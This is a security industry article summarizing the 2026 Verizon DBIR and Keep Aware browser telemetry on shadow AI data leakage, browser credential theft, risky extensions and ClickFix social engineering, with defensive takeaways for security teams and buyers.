"Employees are pasting and uploading confidential data into ChatGPT, Gemini, and dozens of other AI tools every day," Keep Aware reports — a blunt observation that the 2026 Verizon Data Breach Investigations Report (DBIR) and independent browser telemetry now corroborate.
Shadow AI: a rapid, measurable enterprise risk
The 2026 DBIR identified "Shadow AI" as the third most common non‑malicious insider action seen in Data Loss Prevention (DLP) datasets, and recorded a fourfold increase year‑over‑year. Keep Aware's browser telemetry quantifies how that risk plays out: 67% of users access AI services on corporate devices using personal, non‑corporate accounts, and 45% of employees are regular AI users. Over half of AI prompt inputs observed by Keep Aware are sent to personal accounts, while 23% of sensitive prompt uploads transit through personal or unverified accounts — meaning those flows sit outside corporate DLP and logging controls.
Credential abuse and the browser detection gap
The 2026 DBIR reports that 39% of breaches involved credential abuse. Keep Aware's 2025 observations place browser‑based credential theft as the single largest browser attack category, accounting for about 41% of observed browser threat activity — a figure that implies future breaches will continue to draw on stolen credentials captured in the browser.
Keep Aware further found stark detection failures: 63% of Microsoft‑themed phishing sites it observed were not flagged by any VirusTotal vendor at the moment employees encountered them, and 100% of credential theft attempts passed unblocked through network proxies, DNS filters, and endpoint agents. In other words, these attacks routinely evade non‑browser controls and only manifest where the page is rendered and the user interacts — inside the browser.
Browser extensions: privileged, mislabeled, and risky
Extensions can read and modify page content and exfiltrate data from the browser context. The DBIR flagged that the average enterprise had more than 15% of users with unauthorized AI extensions installed. Keep Aware's extension telemetry adds that 13% of unique browser extensions observed across its customers were classified as high or critical risk. Crucially, 93% of poor‑reputation extensions were listed by browser marketplaces as "productivity" tools — the very category many allowlisting policies treat as safe — rendering simple category‑based allowlists functionally ineffective for this threat class.
ClickFix and browser‑native social engineering
Both the DBIR and Keep Aware's reporting name ClickFix as an emerging browser‑centric tactic. The Verizon DBIR measured ClickFix at 2.7% of browser‑detected attacks; Keep Aware describes it as a deceptive social engineering technique that begins in the browser but executes malicious code on the host. The pattern: a browser encounter (compromised sites or LLM responses), a deceptive action that causes the user to run malicious code, and a follow‑on host compromise with info‑stealers or remote access tooling. The browser is the social engineering medium and therefore the first line where detection matters.
What this means for technologists, procurement leaders, and end users
- Technologists and security teams: the data makes a blunt point — traffic, DNS, and endpoint agents miss many of the artifacts attackers generate in-browser. The only consistent observation point for these classes of attack is the browser session itself.
- Procurement and IT buyers: marketplace categories are not reliable risk indicators; Keep Aware's telemetry shows most poor‑reputation extensions pose as "productivity" tools. Allowlisting by category will miss high‑risk add‑ons.
- End users and managers: routine workflows — copying code or documents into AI chat, installing browser extensions — are the pathways where sensitive data and credentials are most commonly exposed, often without malicious intent but with measurable enterprise impact.
The convergence in the DBIR and Keep Aware telemetry points to a single operational conclusion buried in the numbers: for many users the browser is the work environment, and attackers are living where that work happens. Security programs that rely exclusively on network, endpoint, or identity telemetry will continue to have blind spots in exactly the places adversaries have moved to exploit. The browser is no longer optional terrain to secure; it is the frontline.
Original reporting: What 2026 DBIR Confirms: Attacks Are Living in the Browser
